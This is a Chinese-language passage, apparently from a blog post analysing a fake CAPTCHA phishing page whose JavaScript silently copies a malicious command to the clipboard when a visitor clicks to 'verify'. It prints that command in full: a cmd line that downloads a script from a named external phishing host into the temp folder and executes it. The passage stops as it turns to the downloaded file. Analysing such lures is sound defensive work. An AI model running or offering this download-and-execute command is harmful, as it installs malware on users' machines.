秘密就在这里,记得我们刚访问网站时让我们验证是否是人类,验证时得点鼠标,上面这段js代码就是检测鼠标的点击事件,当发现鼠标点击时就把恶意脚本自动的复制到粘贴板中,这时候不用CTRL+C就能直接CTRL+V了。 那粘贴板中的恶意代码是什么呢? cmd /c "curl -k -L -Ss https://hcaptcha.ru/r -o "%TEMP%\1.cmd" && "%TEMP%\1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot. 上面的代码意思是从 https://hcaptcha.ru/r (重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!)下载文件存到临时目录中,文件的名字叫“1.cmd”,然后执行此文件。 打开下载后的文件发现是如下的代码: